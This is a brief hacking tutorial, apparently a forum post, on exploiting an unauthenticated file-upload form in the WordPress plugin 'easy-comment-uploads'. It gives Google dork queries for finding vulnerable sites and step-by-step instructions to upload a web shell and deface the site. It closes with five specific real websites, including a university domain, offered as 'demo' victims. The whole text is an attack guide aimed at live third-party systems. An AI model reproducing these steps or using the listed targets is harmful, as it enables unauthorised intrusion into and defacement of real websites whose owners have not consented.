And Thousands of WordPress websites Are Vulnerable For This Attack
Google Dorks For This WordPress Exploit.
Dork:
- inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
- /wp-content/plugins/easy-comment-uploads/upload-form.php
- Index of /wp-content/plugins/easy-comment-uploads
Step 1
Open Google.com and Enter Any One Google Dork which Given,
Step 2
Now select any Website of WordPress.And Go To This
URL
VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Get Upload Option Here Posted Image
Now Upload Your Shell To Deface The Website
Step 3
And Now Check It Here
VictimSite.com/wp-content/uploads/2012/10/yourfilehere
Demo Site :
- http://robbyvillegas.com/wp-content/plugins/easy-comment-uploads/upload-form.php
- http://www.must.unimelb.edu.au/wp-content/plugins/easy-comment-uploads/upload-form.php
- http://www.blendcoffee.com.au/wp-content/plugins/easy-comment-uploads/upload-form.php
- http://www.fairyhouses.com/wp-content/plugins/easy-comment-uploads/upload-form.php
- http://www.jobsplace.co.il/wp-content/plugins/easy-comment-uploads/upload-form.php